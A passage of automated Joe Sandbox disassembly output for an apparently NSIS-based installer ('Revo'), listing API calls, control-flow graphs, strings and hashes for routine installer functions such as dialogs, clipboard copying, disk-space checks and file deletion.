                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                                                                                                                                              • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405A5F
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405A64
                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 00405AAE
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00405AF3
                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405B27
                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405B88
                                                                                                                                                                            • EmptyClipboard.USER32 ref: 00405B8E
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                                                                                                                                            • CloseClipboard.USER32 ref: 00405BE9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                            • String ID: H'D${
                                                                                                                                                                            • API String ID: 590372296-3538427676
                                                                                                                                                                            • Opcode ID: 7fb9c064395b8d5c06d15c7ce8b1b0c6621f3944dcd12c6d8502cf874e2b8e07
                                                                                                                                                                            • Instruction ID: a946544cda80648ae215d749a1304cfc675a42e6d6c1d5f97ef9608d1157b9e3
                                                                                                                                                                            • Opcode Fuzzy Hash: 7fb9c064395b8d5c06d15c7ce8b1b0c6621f3944dcd12c6d8502cf874e2b8e07
                                                                                                                                                                            • Instruction Fuzzy Hash: 0DB16770800608FFDF11AFA0DD859AE3B78EB48354F10413AFA45BA1A0D7785A41DF69

                                                                                                                                                                            Control-flow Graph

control_flow_graph 381 404b12-404b3c 382 404b3e-404b4a call 405ce6 call 406950 381->382 383 404b4f-404b59 381->383 382->383 385 404bc7-404bce 383->385 386 404b5b-404b71 GetDlgItem call 405fe8 383->386 389 404bd4-404bdd 385->389 390 404ca5-404cac 385->390 397 404b83-404bbc SetWindowTextW call 404621 * 2 call 404656 call 406a96 386->397 398 404b73-404b7b call 40601c 386->398 393 404bf7-404bfc 389->393 394 404bdf-404bea 389->394 395 404cbb-404cd6 call 405ce6 call 406079 390->395 396 404cae-404cb5 390->396 393->390 401 404c02-404c44 call 4066df SHBrowseForFolderW 393->401 399 404bf0 394->399 400 404e53-404e65 call 404688 394->400 419 404cd8 395->419 420 404cdf-404cf7 call 4066a2 call 406a96 395->420 396->395 396->400 397->400 439 404bc2-404bc5 SHAutoComplete 397->439 398->397 417 404b7d-404b7e call 405f71 398->417 399->393 413 404c46-404c60 CoTaskMemFree call 405f71 401->413 414 404c9e 401->414 426 404c62-404c68 413->426 427 404c8a-404c9c SetDlgItemTextW 413->427 414->390 417->397 419->420 437 404d33-404d44 call 4066a2 call 40601c 420->437 438 404cf9-404cff 420->438 426->427 430 404c6a-404c81 call 4066df lstrcmpiW 426->430 427->390 430->427 441 404c83-404c85 lstrcatW 430->441 453 404d46 437->453 454 404d49-404d62 GetDiskFreeSpaceW 437->454 438->437 442 404d01-404d13 GetDiskFreeSpaceExW 438->442 439->385 441->427 444 404d15-404d17 442->444 445 404d8b-404da5 442->445 448 404d19 444->448 449 404d1c-404d31 call 405fbd 444->449 447 404da7 445->447 451 404dac-404db6 call 404faf 447->451 448->449 449->437 449->442 459 404dd1-404dda 451->459 460 404db8-404dbf 451->460 453->454 454->447 457 404d64-404d89 MulDiv 454->457 457->451 461 404e0c-404e16 459->461 462 404ddc-404dec call 404f97 459->462 460->459 463 404dc1 460->463 465 404e22-404e28 461->465 466 404e18-404e1f call 40140b 461->466 473 404dfe-404e07 SetDlgItemTextW 462->473 474 404dee-404df7 call 404ece 462->474 467 404dc3-404dc8 463->467 468 404dca 463->468 471 404e2a 465->471 472 404e2d-404e3e call 404643 465->472 466->465 467->459 467->468 468->459 471->472 479 404e40-404e46 472->479 480 404e4d 472->480 473->461 481 404dfc 474->481 479->480 482 404e48 call 404a6b 479->482 480->400 481->461 482->480
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                                                                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001,00000009,00000000,?,00000014,?,?,00000001,?), ref: 00404BC5
                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                                                                                                                                            • lstrcmpiW.KERNEL32(Remove folder: ,00442748,00000000,?,?), ref: 00404C79
                                                                                                                                                                            • lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404C85
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                                                                                                                                              • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00002000,00404CCE), ref: 00405CF9
                                                                                                                                                                              • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                                                                                                                                              • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                                                                                                                                              • Part of subcall function 00406950: CharNextW.USER32(?,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                                                                                                                                              • Part of subcall function 00406950: CharPrevW.USER32(?,?,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(C:\Program Files\,?,?,?,00000001,C:\Program Files\,?,?,000003FB,?), ref: 00404D0E
                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(C:\Program Files\,?,?,0000040F,?,C:\Program Files\,C:\Program Files\,?,00000001,C:\Program Files\,?,?,000003FB,?), ref: 00404D5A
                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                                                                                                                                              • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                                                                                                                                              • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                                                                                                                                              • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: A$C:\Program Files\$H'D$Remove folder:
                                                                                                                                                                            • API String ID: 4039761011-425954661
                                                                                                                                                                            • Opcode ID: 6e15f0ff5402f2575495af3f7f30cd26abeab5420aa242f492b7e6411a88d81d
                                                                                                                                                                            • Instruction ID: 631ab75ceab9e691d6259a87645379c0ec27aba7f5179a8718d2cd07d5d9f082
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e15f0ff5402f2575495af3f7f30cd26abeab5420aa242f492b7e6411a88d81d
                                                                                                                                                                            • Instruction Fuzzy Hash: 52A1A3B1900209ABDB11AFA5CD81AEF77B8FF84754F11843BF601B62D1DB7C89418B69

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 616 405dae-405dd4 call 406079 619 405dd6-405de8 DeleteFileW 616->619 620 405ded-405df4 616->620 621 405f6a-405f6e 619->621 622 405df6-405df8 620->622 623 405e07-405e17 call 4066a2 620->623 625 405f18-405f1d 622->625 626 405dfe-405e01 622->626 629 405e26-405e27 call 405fbd 623->629 630 405e19-405e24 lstrcatW 623->630 625->621 628 405f1f-405f22 625->628 626->623 626->625 631 405f24-405f2a 628->631 632 405f2c-405f34 call 4069ff 628->632 633 405e2c-405e30 629->633 630->633 631->621 632->621 640 405f36-405f4a call 405f71 call 405d66 632->640 636 405e32-405e3a 633->636 637 405e3c-405e42 lstrcatW 633->637 636->637 639 405e47-405e63 lstrlenW FindFirstFileW 636->639 637->639 641 405e69-405e71 639->641 642 405f0d-405f11 639->642 656 405f62-405f65 call 405727 640->656 657 405f4c-405f4f 640->657 645 405e91-405ea5 call 4066a2 641->645 646 405e73-405e7b 641->646 642->625 644 405f13 642->644 644->625 658 405ea7-405eaf 645->658 659 405ebc-405ec7 call 405d66 645->659 648 405ef0-405f00 FindNextFileW 646->648 649 405e7d-405e85 646->649 648->641 653 405f06-405f07 FindClose 648->653 649->645 654 405e87-405e8f 649->654 653->642 654->645 654->648 656->621 657->631 660 405f51-405f60 call 405727 call 406462 657->660 658->648 661 405eb1-405eba call 405dae 658->661 669 405ee8-405eeb call 405727 659->669 670 405ec9-405ecc 659->670 660->621 661->648 669->648 673 405ee0-405ee6 670->673 674 405ece-405ede call 405727 call 406462 670->674 673->648 674->648
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,004BD000), ref: 00405DD7
                                                                                                                                                                            • lstrcatW.KERNEL32(00452750,\*.*,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E1F
                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E42
                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E48
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00452750,?,?,?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E58
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405F07
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: P'E$\*.*
• API String ID: 2035342205-897026672
APIs
• FindFirstFileW.KERNEL32(74DF3420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 00406A0A
• FindClose.KERNEL32(00000000), ref: 00406A16
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0

Control-flow Graph (function at 404122; legend: Executed / Not Executed)

APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
• ShowWindow.USER32(?), ref: 0040417E
• GetWindowLongW.USER32(?,000000F0), ref: 00404190
• ShowWindow.USER32(?,00000004), ref: 004041A9
• DestroyWindow.USER32 ref: 004041BD
• SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
• GetDlgItem.USER32(?,?), ref: 004041F5
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
• IsWindowEnabled.USER32(00000000), ref: 00404210
• GetDlgItem.USER32(?,00000001), ref: 004042BB
• GetDlgItem.USER32(?,00000002), ref: 004042C5
• SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
• GetDlgItem.USER32(?,00000003), ref: 004043D6
• ShowWindow.USER32(00000000,?), ref: 004043F7
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404409
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404424
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
• EnableMenuItem.USER32(00000000), ref: 00404441
                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                                                                                                                                            • lstrlenW.KERNEL32(00442748,?,00442748,00000000), ref: 00404496
                                                                                                                                                                            • SetWindowTextW.USER32(?,00442748), ref: 004044AA
                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Item$MessageSendShow$Long$CallbackDispatcherMenuUser$ClassDestroyEnableEnabledSystemTextlstrlen
                                                                                                                                                                            • String ID: H'D
                                                                                                                                                                            • API String ID: 3964124867-716976774
                                                                                                                                                                            • Opcode ID: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
                                                                                                                                                                            • Instruction ID: 87935a59af8161b0f78328c19d4fe10c51b4425a276279a6d07330ead90e7465
                                                                                                                                                                            • Opcode Fuzzy Hash: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
                                                                                                                                                                            • Instruction Fuzzy Hash: C4C1C2B1500604BBCB216F61EE85E2B3BA8FB85745F11097EFB41B11F0DB7998419B2E

Control-flow Graph (function beginning at 00403D74)
APIs
  • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
  • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
• lstrcatW.KERNEL32(004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,74DF3420,004D1000,00000000,004BD000,00008001), ref: 00403DF5
• lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,74DF3420), ref: 00403E75
• lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000), ref: 00403E88
• GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403E93
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C1000), ref: 00403EDC
  • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
• RegisterClassW.USER32(00464200), ref: 00403F19
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
• ShowWindow.USER32(00000005,00000000), ref: 00403F9C
• GetClassInfoW.USER32(00000000,RichEdit20W,00464200), ref: 00403FC8
• GetClassInfoW.USER32(00000000,RichEdit,00464200), ref: 00403FD5
• RegisterClassW.USER32(00464200), ref: 00403FDE
• DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H'D$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-2601196950
• Opcode ID: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
• Instruction ID: 15514f3cea8a7976e0aa4835bc9f56462f0e59a4e5397df6ef3051f83c2bc2bc
• Opcode Fuzzy Hash: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
• Instruction Fuzzy Hash: 3C61E770640301BED720AF669D95F273AACEB85B49F10457FF941B22E2DB7D58018A2E

Control-flow Graph (function beginning at 004030F5)
APIs
• GetTickCount.KERNEL32 ref: 00403109
• GetModuleFileNameW.KERNEL32(00000000,004D9000,00002000), ref: 00403125
  • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
  • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
• GetFileSize.KERNEL32(00000000,00000000,004DD000,00000000,004C9000,004C9000,004D9000,004D9000,80000000,00000003), ref: 0040316E
• GlobalAlloc.KERNEL32(00000040,00008001), ref: 004032B0
Strings
• Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403347
• Null, xrefs: 004031EC
• hA, xrefs: 004032B6
• Inst, xrefs: 004031DA
• Error launching installer, xrefs: 00403145
• soft, xrefs: 004031E3
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$hA$soft
• API String ID: 2803837635-3376623841
• Opcode ID: 7dbbcf09529f8eb162c35c87980925caa7ffea24ff0345c9a2ccdde980ec1a20
• Instruction ID: ad1f7a9ef70f4aee06910e8501363caf5be3f78a24e024e3506d72c770e38dd5
• Opcode Fuzzy Hash: 7dbbcf09529f8eb162c35c87980925caa7ffea24ff0345c9a2ccdde980ec1a20
• Instruction Fuzzy Hash: 0271A071D00204ABDB209FA4DD85B6E7AACEB05716F10417FE911B72D1DB789F408B6D

Control-flow Graph
APIs
• GetSystemDirectoryW.KERNEL32(Remove folder: ,00002000), ref: 00406801
• GetWindowsDirectoryW.KERNEL32(Remove folder: ,00002000,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 00406817
• SHGetPathFromIDListW.SHELL32(00000000,Remove folder: ), ref: 00406875
• CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
• lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
• lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 00406903
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
• String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 4024019347-627599061
• Opcode ID: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
• Instruction ID: 81e951f8fe173c1ecdb7e664093ca8164433b695446651b9203bd6f4f8051ee3
• Instruction Fuzzy Hash: 5B6145B2A053019BEB20AF65DC8472B77D4AF45314F25453FF583B22D0EA7C8960876E

Control-flow Graph
APIs
• lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
• lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
• lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000), ref: 00405782
• SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\), ref: 00405794
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
• SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
